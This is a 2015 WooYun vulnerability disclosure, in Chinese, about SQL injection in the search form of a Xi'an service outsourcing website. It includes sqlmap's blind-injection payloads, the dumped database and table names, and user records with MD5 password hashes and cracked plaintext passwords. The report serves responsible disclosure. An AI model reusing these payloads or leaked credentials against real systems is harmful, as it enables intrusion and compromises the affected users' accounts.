漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0152190
漏洞标题:西安服务外包网sql注入导致数据库外泄
相关厂商:cncert国家互联网应急中心
漏洞作者: 编程浪子
提交时间:2015-11-08 19:00
修复时间:2016-01-11 15:32
公开时间:2016-01-11 15:32
漏洞类型:SQL注射漏洞
危害等级:低
自评Rank:5
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-11-08: 细节已通知厂商并且等待厂商处理中
2015-11-19: 厂商已经确认,细节仅向厂商公开
2015-11-29: 细节向核心白帽子及相关领域专家公开
2015-12-09: 细节向普通白帽子公开
2015-12-19: 细节向实习白帽子公开
2016-01-11: 细节向公众公开
简要描述:
用户输入过滤不严,导致注入,数据库外泄
详细说明:
老和尚的批量包里有这个网站,但注入点不同
http://**.**.**.**/search.jsp (POST)
title=2015
sqlmap identified the following injection point(s) with a total of 55 HTTP(s) requests:
---
Parameter: title (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: title=2015%' AND 2204=2204 AND '%'='
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: title=2015%' AND (SELECT * FROM (SELECT(SLEEP(5)))lWao) AND '%'='
---
web application technology: JSP
back-end DBMS: MySQL 5.0.12
漏洞证明:
爆出的库内容:
available databases [3]:
[*] information_schema
[*] test
[*] xasourcing_new
Database: xasourcing_new
[78 tables]
+---------------------------------------+
| catalog |
| bids |
| buyer |
| catalog_permission |
| cate_content |
| category |
| city |
| dynamic_info |
| dynamic_info_conf |
| email_system |
| files |
| n_cate |
| n_channel |
| n_column |
| n_content_update_count |
| n_content_update_count2 |
| n_content_update_count3 |
| n_content_update_count4 |
| n_content_update_count5 |
| n_contents |
| n_contents_add_rights |
| n_contents_count |
| n_contents_pic |
| n_keyword |
| news_shangbao |
| notes |
| p_department_type |
| p_department_type_and_roles |
| p_departments |
| p_functions |
| p_menu |
| p_organization_type |
| p_organization_type_and_roles |
| p_organizations |
| p_orgtype_and_users_view |
| p_role_menu_system |
| p_roles |
| p_roles_and_functions |
| p_system |
| p_users |
| p_users_and_companys |
| p_users_and_roles |
| pic |
| pic_org |
| picrelation |
| pictype |
| pro_product |
| pro_recommend |
| pro_skim |
| pro_type |
| project |
| provider |
| question |
| question_catalog_ref |
| recommend |
| s_citys |
| s_companys |
| s_parks |
| s_province_and_city |
| s_province_and_city_en |
| s_province_and_city_jp |
| skim |
| specialty |
| sub_users |
| subscribes |
| sysmode |
| systemconfigure |
| systemlog |
| sysuser |
| template |
| type |
| user_type |
| v_jilu |
| v_xiangmu |
| v_xiangmu_org |
| v_xuanxiang |
| v_zhuti |
| v_zhuti_org |
+---------------------------------------+
+-----+--------+------------+---------------+----------+-----------+-----------+------------+------------+------------------+-------------------------------------------+
| id | org_id | user_id | department_id | user_sex | user_make | user_duty | user_name | user_state | user_email | user_password |
+-----+--------+------------+---------------+----------+-----------+-----------+------------+------------+------------------+-------------------------------------------+
| 1 | 0 | admin | 0 | 1 | 0 | asdfasdf | keke | 0 | 111@111.111 | 2eb21875ca6bcefc4a8c03e4f370558f |
| 400 | 390 | user | 389 | 1 | 1 | 管理员 | 系统管理员 | 0 | user@user.user | bdbb99573c881d5448bd2e886ee160fb |
| 401 | 391 | user1 | 390 | 1 | 3 | 管理员 | user1 | 1 | 123@**.**.**.** | 4297f44b13955235245b2497399d7a93 (123123) |
| 402 | 392 | user2 | 391 | 1 | 3 | 管理员 | user2 | 1 | 123@**.**.**.** | 4297f44b13955235245b2497399d7a93 (123123) |
| 403 | 393 | user3 | 392 | 1 | 3 | 管理员 | user3 | 1 | 123@**.**.**.** | 4297f44b13955235245b2497399d7a93 (123123) |
| 421 | 411 | gaopeng | 410 | 1 | 2 | <blank> | gaopeng | 1 | gaop@**.**.**.** | 4297f44b13955235245b2497399d7a93 (123123) |
| 432 | 390 | gaop | 389 | 1 | 3 | CEO | 高鹏 | 1 | gaop@**.**.**.** | 96e79218965eb72c92a549dd5a330112 (111111) |
| 436 | 423 | xinbayy | 422 | 1 | 2 | <blank> | xinbayy | 1 | xinbayy@**.**.**.** | e10adc3949ba59abbe56e057f20f883e (123456) |
| 437 | 424 | xajinrui | 423 | 1 | 2 | <blank> | xajinrui | 1 | info@**.**.**.** | e10adc3949ba59abbe56e057f20f883e (123456) |
| 438 | 425 | xazhongyue | 424 | 1 | 2 | <blank> | xazhongyue | 1 | lh@**.**.**.** | 96e79218965eb72c92a549dd5a330112 (111111) |
+-----+--------+------------+---------------+----------+-----------+-----------+------------+------------+------------------+-------------------------------------------+
修复方案:
用户输入过滤
版权声明:转载请注明来源 编程浪子@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:11
确认时间:2015-11-19 14:12
厂商回复:
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给陕西分中心,由陕西分中心后续协调网站管理单位处置。
最新状态:
暂无